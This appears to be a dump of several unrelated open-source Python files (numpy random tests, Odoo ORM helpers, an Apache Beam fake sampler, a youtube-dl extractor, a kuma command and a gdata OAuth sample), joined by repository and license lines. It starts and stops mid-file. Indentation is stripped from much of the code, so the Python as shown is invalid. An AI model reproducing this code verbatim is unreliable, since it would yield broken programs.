assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
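# A hedged sketch (added; `_demo_broadcast_equivalence` is an invented name)
# of the property TestBroadcast checks: the draw is identical whichever
# argument carries the length, because parameters are broadcast against each
# other before sampling.
def _demo_broadcast_equivalence():
    np.random.seed(123456789)
    a = np.random.uniform([0] * 3, [1])
    np.random.seed(123456789)
    b = np.random.uniform([0], [1] * 3)
    assert_array_equal(a, b)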
class TestThread(TestCase):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
        # the same generation, done serially
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
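# A minimal sketch (added; `_demo_thread_isolation` is an invented name) of
# the property check_function verifies: each thread owns its RandomState, so
# threaded and serial draws from the same seeds agree exactly (modulo the
# x87 caveat noted above).
def _demo_thread_isolation():
    from threading import Thread
    seeds = range(2)
    out = np.empty((2, 100))
    def fill(state, row):
        row[...] = state.normal(size=100)
    threads = [Thread(target=fill, args=(np.random.RandomState(s), out[i]))
               for i, s in enumerate(seeds)]
    [t.start() for t in threads]
    [t.join() for t in threads]
    serial = np.empty_like(out)
    for i, s in enumerate(seeds):
        fill(np.random.RandomState(s), serial[i])
    assert_array_equal(out, serial)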
# See Issue #4263
class TestSingleEltArrayInput(TestCase):
def setUp(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
self.assertEqual(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
self.assertEqual(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [np.bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
self.assertEqual(out.shape, self.tgtShape)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
OpusVL/odoo | openerp/osv/orm.py | 126 | 6167 | import simplejson
from lxml import etree
from ..exceptions import except_orm
from ..models import (
MetaModel,
BaseModel,
Model, TransientModel, AbstractModel,
MAGIC_COLUMNS,
LOG_ACCESS_COLUMNS,
)
# extra definitions for backward compatibility
browse_record_list = BaseModel
class browse_record(object):
""" Pseudo-class for testing record instances """
class __metaclass__(type):
def __instancecheck__(self, inst):
return isinstance(inst, BaseModel) and len(inst) <= 1
class browse_null(object):
""" Pseudo-class for testing null instances """
class __metaclass__(type):
def __instancecheck__(self, inst):
return isinstance(inst, BaseModel) and not inst
def transfer_field_to_modifiers(field, modifiers):
default_values = {}
state_exceptions = {}
for attr in ('invisible', 'readonly', 'required'):
state_exceptions[attr] = []
default_values[attr] = bool(field.get(attr))
    for state, modifs in field.get("states", {}).items():
for modif in modifs:
if default_values[modif[0]] != modif[1]:
state_exceptions[modif[0]].append(state)
for attr, default_value in default_values.items():
if state_exceptions[attr]:
modifiers[attr] = [("state", "not in" if default_value else "in", state_exceptions[attr])]
else:
modifiers[attr] = default_value
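# A worked example (added; not in the original source) of the folding above,
# for a fields_get()-style descriptor:
#
#     modifiers = {}
#     transfer_field_to_modifiers(
#         {'readonly': True, 'states': {'draft': [('readonly', False)]}},
#         modifiers)
#     # -> {'invisible': False, 'required': False,
#     #     'readonly': [('state', 'not in', ['draft'])]}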
# Don't deal with groups; that is done by check_group().
# Need the context to evaluate the invisible attribute on tree views.
# For non-tree views, the context shouldn't be given.
def transfer_node_to_modifiers(node, modifiers, context=None, in_tree_view=False):
if node.get('attrs'):
modifiers.update(eval(node.get('attrs')))
if node.get('states'):
if 'invisible' in modifiers and isinstance(modifiers['invisible'], list):
# TODO combine with AND or OR, use implicit AND for now.
modifiers['invisible'].append(('state', 'not in', node.get('states').split(',')))
else:
modifiers['invisible'] = [('state', 'not in', node.get('states').split(','))]
for a in ('invisible', 'readonly', 'required'):
if node.get(a):
v = bool(eval(node.get(a), {'context': context or {}}))
if in_tree_view and a == 'invisible':
# Invisible in a tree view has a specific meaning, make it a
# new key in the modifiers attribute.
modifiers['tree_invisible'] = v
elif v or (a not in modifiers or not isinstance(modifiers[a], list)):
# Don't set the attribute to False if a dynamic value was
# provided (i.e. a domain from attrs or states).
modifiers[a] = v
def simplify_modifiers(modifiers):
for a in ('invisible', 'readonly', 'required'):
if a in modifiers and not modifiers[a]:
del modifiers[a]
def transfer_modifiers_to_node(modifiers, node):
if modifiers:
simplify_modifiers(modifiers)
node.set('modifiers', simplejson.dumps(modifiers))
def setup_modifiers(node, field=None, context=None, in_tree_view=False):
""" Processes node attributes and field descriptors to generate
the ``modifiers`` node attribute and set it on the provided node.
Alters its first argument in-place.
:param node: ``field`` node from an OpenERP view
:type node: lxml.etree._Element
:param dict field: field descriptor corresponding to the provided node
:param dict context: execution context used to evaluate node attributes
:param bool in_tree_view: triggers the ``tree_invisible`` code
path (separate from ``invisible``): in
tree view there are two levels of
invisibility, cell content (a column is
present but the cell itself is not
displayed) with ``invisible`` and column
invisibility (the whole column is
hidden) with ``tree_invisible``.
:returns: nothing
"""
modifiers = {}
if field is not None:
transfer_field_to_modifiers(field, modifiers)
transfer_node_to_modifiers(
node, modifiers, context=context, in_tree_view=in_tree_view)
transfer_modifiers_to_node(modifiers, node)
def test_modifiers(what, expected):
modifiers = {}
if isinstance(what, basestring):
node = etree.fromstring(what)
transfer_node_to_modifiers(node, modifiers)
simplify_modifiers(modifiers)
json = simplejson.dumps(modifiers)
assert json == expected, "%s != %s" % (json, expected)
elif isinstance(what, dict):
transfer_field_to_modifiers(what, modifiers)
simplify_modifiers(modifiers)
json = simplejson.dumps(modifiers)
assert json == expected, "%s != %s" % (json, expected)
# To use this test:
# import openerp
# openerp.osv.orm.modifiers_tests()
def modifiers_tests():
test_modifiers('<field name="a"/>', '{}')
test_modifiers('<field name="a" invisible="1"/>', '{"invisible": true}')
test_modifiers('<field name="a" readonly="1"/>', '{"readonly": true}')
test_modifiers('<field name="a" required="1"/>', '{"required": true}')
test_modifiers('<field name="a" invisible="0"/>', '{}')
test_modifiers('<field name="a" readonly="0"/>', '{}')
test_modifiers('<field name="a" required="0"/>', '{}')
test_modifiers('<field name="a" invisible="1" required="1"/>', '{"invisible": true, "required": true}') # TODO order is not guaranteed
test_modifiers('<field name="a" invisible="1" required="0"/>', '{"invisible": true}')
test_modifiers('<field name="a" invisible="0" required="1"/>', '{"required": true}')
test_modifiers("""<field name="a" attrs="{'invisible': [('b', '=', 'c')]}"/>""", '{"invisible": [["b", "=", "c"]]}')
# The dictionary is supposed to be the result of fields_get().
test_modifiers({}, '{}')
test_modifiers({"invisible": True}, '{"invisible": true}')
test_modifiers({"invisible": False}, '{}')
| agpl-3.0 |
axbaretto/beam | sdks/python/apache_beam/runners/worker/statesampler_fake.py | 7 | 1339 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This module is experimental. No backwards-compatibility guarantees.
class StateSampler(object):
def __init__(self, *args, **kwargs):
pass
def scoped_state(self, step_name, state_name=None, io_target=None):
return _FakeScopedState()
def start(self):
pass
def stop(self):
pass
def stop_if_still_running(self):
self.stop()
def commit_counters(self):
pass
class _FakeScopedState(object):
def __enter__(self):
pass
def __exit__(self, *unused_args):
pass
def sampled_seconds(self):
return 0
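# A hedged usage sketch (added; the step and state names are invented): the
# fake mirrors the real sampler's interface, so worker code can enter scoped
# states unconditionally:
#
#     sampler = StateSampler()
#     with sampler.scoped_state('step1', 'process'):
#         pass  # a no-op here; the real sampler would time this region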
| apache-2.0 |
kthordarson/youtube-dl-ruv | youtube_dl/extractor/savefrom.py | 185 | 1131 | # coding: utf-8
from __future__ import unicode_literals
import os.path
import re
from .common import InfoExtractor
class SaveFromIE(InfoExtractor):
IE_NAME = 'savefrom.net'
_VALID_URL = r'https?://[^.]+\.savefrom\.net/\#url=(?P<url>.*)$'
_TEST = {
'url': 'http://en.savefrom.net/#url=http://youtube.com/watch?v=UlVRAPW2WJY&utm_source=youtube.com&utm_medium=short_domains&utm_campaign=ssyoutube.com',
'info_dict': {
'id': 'UlVRAPW2WJY',
'ext': 'mp4',
'title': 'About Team Radical MMA | MMA Fighting',
'upload_date': '20120816',
'uploader': 'Howcast',
'uploader_id': 'Howcast',
'description': 're:(?s).* Hi, my name is Rene Dreifuss\. And I\'m here to show you some MMA.*',
},
'params': {
'skip_download': True
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = os.path.splitext(url.split('/')[-1])[0]
return {
'_type': 'url',
'id': video_id,
'url': mobj.group('url'),
}
| unlicense |
anaran/kuma | kuma/wiki/management/commands/generate_sphinx_template.py | 5 | 1665 | from django.conf import settings
from django.core.management.base import NoArgsCommand
from django.shortcuts import render
from django.test import RequestFactory
from django.utils.translation import ugettext
from html5lib import constants as html5lib_constants
from kuma.wiki.content import parse
class Command(NoArgsCommand):
def handle(self, *args, **options):
        # Not ideal, but we need to temporarily remove inline elements as a
        # void/ignored element.
        # TODO: Can this clone code be shortened?
new_void_set = set()
for item in html5lib_constants.voidElements:
new_void_set.add(item)
new_void_set.remove('link')
new_void_set.remove('img')
html5lib_constants.voidElements = frozenset(new_void_set)
# Create a mock request for the sake of rendering the template
request = RequestFactory().get('/')
request.LANGUAGE_CODE = settings.LANGUAGE_CODE
request.META['SERVER_NAME'] = 'developer.mozilla.org'
# Load the page with sphinx template
content = render(request, 'wiki/sphinx.html',
{'is_sphinx': True, 'gettext': ugettext}).content
# Use a filter to make links absolute
tool = parse(content, is_full_document=True)
content = tool.absolutizeAddresses(
base_url=settings.PRODUCTION_URL,
tag_attributes={
'a': 'href',
'img': 'src',
'form': 'action',
'link': 'href',
'script': 'src'
}).serialize()
# Output the response
print content.encode('utf8')
| mpl-2.0 |
campbe13/openhatch | vendor/packages/gdata/samples/oauth/oauth_on_appengine/main_hmac.py | 126 | 7397 | #!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'e.bidelman (Eric Bidelman)'
import cgi
import os
import gdata.auth
import gdata.docs
import gdata.docs.service
import gdata.alt.appengine
from appengine_utilities.sessions import Session
from django.utils import simplejson
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
SETTINGS = {
'APP_NAME': 'google-GDataOAuthAppEngine-v1',
'CONSUMER_KEY': 'YOUR_CONSUMER_KEY',
'CONSUMER_SECRET': 'YOUR_CONSUMER_SECRET',
'SIG_METHOD': gdata.auth.OAuthSignatureMethod.HMAC_SHA1,
'SCOPES': ['http://docs.google.com/feeds/',
'https://docs.google.com/feeds/']
}
gdocs = gdata.docs.service.DocsService(source=SETTINGS['APP_NAME'])
gdocs.SetOAuthInputParameters(SETTINGS['SIG_METHOD'], SETTINGS['CONSUMER_KEY'],
consumer_secret=SETTINGS['CONSUMER_SECRET'])
gdata.alt.appengine.run_on_appengine(gdocs)
class MainPage(webapp.RequestHandler):
"""Main page displayed to user."""
# GET /
def get(self):
if not users.get_current_user():
self.redirect(users.create_login_url(self.request.uri))
access_token = gdocs.token_store.find_token('%20'.join(SETTINGS['SCOPES']))
if isinstance(access_token, gdata.auth.OAuthToken):
form_action = '/fetch_data'
form_value = 'Now fetch my docs!'
revoke_token_link = True
else:
form_action = '/get_oauth_token'
form_value = 'Give this website access to my Google Docs'
revoke_token_link = None
template_values = {
'form_action': form_action,
'form_value': form_value,
'user': users.get_current_user(),
'revoke_token_link': revoke_token_link,
'oauth_token': access_token,
'consumer': gdocs.GetOAuthInputParameters().GetConsumer(),
'sig_method': gdocs.GetOAuthInputParameters().GetSignatureMethod().get_name()
}
path = os.path.join(os.path.dirname(__file__), 'index.html')
self.response.out.write(template.render(path, template_values))
class OAuthDance(webapp.RequestHandler):
"""Handler for the 3 legged OAuth dance, v1.0a."""
"""This handler is responsible for fetching an initial OAuth request token,
redirecting the user to the approval page. When the user grants access, they
will be redirected back to this GET handler and their authorized request token
will be exchanged for a long-lived access token."""
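  # A summary sketch (added) of how the three legs map onto this handler:
  #   1. POST /get_oauth_token -> FetchOAuthRequestToken (request token)
  #   2. redirect to the approval page from GenerateOAuthAuthorizationURL
  #   3. GET /get_oauth_token  -> UpgradeToOAuthAccessToken (access token)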
# GET /get_oauth_token
def get(self):
"""Invoked after we're redirected back from the approval page."""
self.session = Session()
oauth_token = gdata.auth.OAuthTokenFromUrl(self.request.uri)
if oauth_token:
oauth_token.secret = self.session['oauth_token_secret']
oauth_token.oauth_input_params = gdocs.GetOAuthInputParameters()
gdocs.SetOAuthToken(oauth_token)
# 3.) Exchange the authorized request token for an access token
oauth_verifier = self.request.get('oauth_verifier', default_value='')
access_token = gdocs.UpgradeToOAuthAccessToken(
oauth_verifier=oauth_verifier)
